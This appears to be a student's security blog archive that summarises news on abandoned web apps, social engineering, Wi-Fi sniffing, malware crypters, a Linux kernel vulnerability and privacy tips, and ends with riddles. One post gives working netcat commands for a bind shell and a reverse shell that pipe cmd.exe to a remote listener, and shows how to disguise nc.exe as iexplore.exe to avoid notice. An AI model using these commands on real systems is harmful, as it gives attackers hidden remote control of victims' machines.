Jayapreethi Selvaraju

Web Apps Haunt 70 Percent of FT 500 Firms

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

https://threatpost.com/threatlist-dead-web-apps-haunt-70-percent-of-ft-500-firms/138659/

This article has very interesting statistics. Based on the study of abandoned websites owned by leading global corporations hammers home the point that old web applications need to be properly mitigated or retired. Otherwise, these resources often haunt a firm long after they have been forgotten.

Key findings:

70% of FT 500 can find access to some of their websites being sold on Dark Web

92% of external web applications have exploitable security flaws or weaknesses

19% of the companies have external unprotected cloud storage

2% of external web applications are properly protected with a WAF

Every single company has some non-compliances with GDPR

Three important things that a social engineering attacker harvest on

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

https://www.fraudconferencenews.com/home/2018/4/10/cybersecurity-expert-speaks-on-social-engineering-techniques-and-gdpr-vulnerabilities

This article has interesting comments about user behavior. and it says that the three “hot states” that fraudsters tap into when attempting their scams in the hopes of clouding your better judgment:

Authority: When an email looks like it comes from your boss or someone with a lot of authority or gravitas, you don’t want to challenge them.
Curiosity: When social engineers mention salaries and bonuses, or when you receive an email from a friend with pictures of wild party a few weeks ago, you may act on your curiosity.
Temptation: When we are made to feel sexually interested in something, we don’t think about a dangerous situation we could be getting ourselves into.

How can a hacker hide from a system admin and still run a backdoor

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

I had this piece of information which I came across when professor was taking NetCat class. I don’t have the whole article. Here is a piece that explains how a hacker can run the backdoor and also hide it from a not so smart network or system admin. It is technical. If you are interested in these type of information, read on.

Netcat Backdoor Victim: nc -L -d -p <port> -t -e cmd.exe

-L is the listening command. -d tells netcat not to open a window when running. -p assigns a port. -t is for telnet. -e activates cmd.exe when client connects to it

Client: nc -v <ip address of victim>

note: In this example netcat runs in the background on the victims machine. A system admin may open task manager and see that nc.exe is running. A smart hacker would change nc.exe to something like iexplorer.exe or updatemanager.exe in order to avoid suspiscion. Now, if a system administrator runs a trusted netstat –a –n command at the DOS prompt, he or she might notice that something is running on a rather odd port, telnet to that port, and discover the trick. However, Windows uses several random ports for varying reasons and netstat output can be time consuming to parse, especially on systems
with a lot of activity. Hackers might try a different approach. If they’ve infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you’d expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat –a –n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:

nc –l –p 80

From the Windows box, the hacker could cleverly “hide” Netcat again and issue these commands:

mkdir C:\Windows\System32\Drivers\q
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>

Now the listening Netcat should pick up the command shell from the Windows machine. This can do a better job of hiding a backdoor from a system administrator. At first glance, the connection will just look like Internet Explorer making a typical HTTP connection. Its only disadvantage for the hacker is that after terminating the shell, there’s no way of restarting it on the Windows side.

Have you ever worried about connecting to Starbuck’s WiFi

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

Sniffing wireless traffic is shockingly simple if you use anything less than WPA2 to secure your network. It basically involves a client associated with your access point in promiscuous mode. This allows programs like Wireshark to see all packets broadcast on the network – he/she must of course have your wifi decryption keys but WEP is practically insecure to someone with very basic tools. To make such an attack more efficient, the attacker would usually issue an APR (ARP Poison Routing) attack on the network. This involves the attacker announcing that he/she is your router and any data you have bound for the gateway then goes via the attacker. This makes the attacker much more likely to see your data. Once the attacker has created this foundation it is a matter of waiting and watching. A script on the attacker’s machine can check the packets coming through until you do something over HTTP, the unencrypted transfer protocol which will enable sniffing of your cookies and passwords.

Now, the article is actually old but some of them are still true. it not only talks about packet sniffing but also other techniques.

https://www.securityweek.com/how-logging-starbucks-can-compromise-your-corporate-security

Recycle everything – Even Malware!!!!!

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

FUD Crypters Recycling Old Malware – https://www.technewsworld.com/perl/section/cyber-security

This article was quite interesting. I bet the hacker got the idea of recycling old malware from the fact that recycling is motivated and promoted in almost every product. He/She might have been drinking a bottle of coke and say the word recycle and then the idea of recycling malware was thought of. Every thing has two sides is indeed true!!!!

Anyway, the article says that this is happening not because crypters are an entirely new phenomenon, but because there’s a sophistication and “ease of use” threshold which appears to have been crossed and What’s happening, from a certain perspective, is the automation of evasion, along with other elements of the malware “supply chain.”

Will Oracle Roil the DB Market?

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

https://www.technewsworld.com/story/85634.html

This article points out how hardware companies have created history in IT industry and they are questioning if big companies like Oracle is steering the market properly. The article says that the first innovation began when Oracle introduced the first Exadata machine that could keep most, and eventually all, of a business’ database in memory, which greatly accelerated database performance, the second innovation announced at last year’s OpenWorld, and fully released earlier this year, is Oracle’s autonomous database software which can patch itself without human help and the third to be cloud computing.

They say that taken together, all of this is more than a technology story and it’s a tale of economics — specifically of creative destruction. Advances in technology have begun to commoditize the tech industry, and Oracle is trying to accelerate this curve. Cloud computing, especially, is a form of commoditization in which basic compute services can be delivered for a fraction of the costs usually involved in supporting all of one’s IT needs in-house.

Give it a read!!

How to Protect Your Online Privacy: A Practical Guide

November 15, 2018 by Jayapreethi Selvaraju Leave a Comment

https://www.technewsworld.com/story/85663.html

This article lists few key things that we can do to protect our personal devices

Beware of Internet Service Providers

2. Strengthen and Protect Your Login Credentials

3. Check the WiFi You’re Using

4. Watch Your Browser

5. Use a Private Search Engine

6. Install a VPN

7. Watch Out for Phishing

8. Encrypt Your Communications

9. Watch What You Share on Social Media

10. Update Early and Often

New Linux Kernel vulnerability

September 30, 2018 by Jayapreethi Selvaraju Leave a Comment

A cybersecurity researcher with Google Project Zero has released the details, and a proof-of-concept (PoC) exploit for a high severity vulnerability that exists in Linux kernel since kernel version 3.16 through 4.18.8.

Discovered by white hat hacker Jann Horn, the kernel vulnerability (CVE-2018-17182) is a cache invalidation bug in the Linux memory management subsystem that leads to use-after-free vulnerability, which if exploited, could allow an attacker to gain root privileges on the targeted system.

The use-after-free (UAF) vulnerabilities are a class of memory corruption bug that can be exploited by unprivileged users to corrupt or alter data in memory, enabling them to cause a denial of service (system crash) or escalate privileges to gain administrative access on a system.

https://thehackernews.com/2018/09/linux-kernel-exploit.html

Someone Distributing Backdoor In IoT Script Vulnerability Scanning

September 30, 2018 by Jayapreethi Selvaraju Leave a Comment

If you are looking for a free hacking tool on the Internet, then be careful. The most widely available tool, claiming to be a swiss army knife for hackers is just a hoax. For example, the Cobian RAT can actually be used to hack, but from the person behind Cobian RAT and not from you who use it.

http://cybernews404.blogspot.com/2017/11/someone-distributing-backdoor-in-iot.html

Riddles!!! – Food For Thought — Answers

September 12, 2018 by Jayapreethi Selvaraju Leave a Comment

I read an article titled “Problem solving is an essential hacker skill” at https://null-byte.wonderhowto.com/forum/problem-solving-is-essential-hacker-skill-0150882/. The article says that problem solving, along with persistence and creativity, is an essential skill in this profession. So, I am posting some riddles as food for thought for our brains.

Riddles:

1. A 10-year-old child kicks the ball. The ball travels a distance of 10 feet and come back to the child. How? — Ans: The child kicks the ball to the sky

2. W is the father of M. But M is not W’s son. How? — Ans: M is W’s daughter

3. What is that which goes up and comes down but does not move? — Ans: Stairs

4. What is that thing that belongs to you but is used most by your friends and people who are familiar to you? — Ans: Your Name

5. What is it that is blind, that can neither speak nor hear but always tells the truth? —- Ans: Mirror

6. The more I grow the less visible I am to you. Who am I? —- Ans: Darkness

7. What is it that vanishes the moment you call for it? —– Ans: Silence

8. Feed me and I will thrive. Give me water, I will vanish. Who am I? — Ans: Fire

9. What is it that can be broken without touching it? —- Ans: Promise

10. What is it that people always call for but are afraid of it? —- Ans: Truth

11. What is it that stays with you all day long and never leave your side? — Ans: Shadow

12. What is the word, when said, is always pronounced wrong? —- Ans: Wrong